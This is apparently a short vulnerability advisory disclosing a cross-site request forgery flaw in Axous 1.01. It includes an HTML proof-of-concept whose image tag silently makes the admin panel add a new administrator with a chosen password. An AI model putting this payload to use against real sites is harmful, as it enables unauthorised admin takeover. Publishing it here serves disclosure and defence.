Home
Consulting
Advisories
Software
Articles
Contact

Axous 1.01 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in Axous 1.01 can be exploited to create a new admin.

Proof Of Concept

<html>
    <body>
        <img src="http://localhost/axous/admin/administrators_add.php?user_name=new_admin&new_passwd=Password1&new_passwd1=Password1&email=test%40test.com&dosubmit=1&id=&action=addnew" />
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC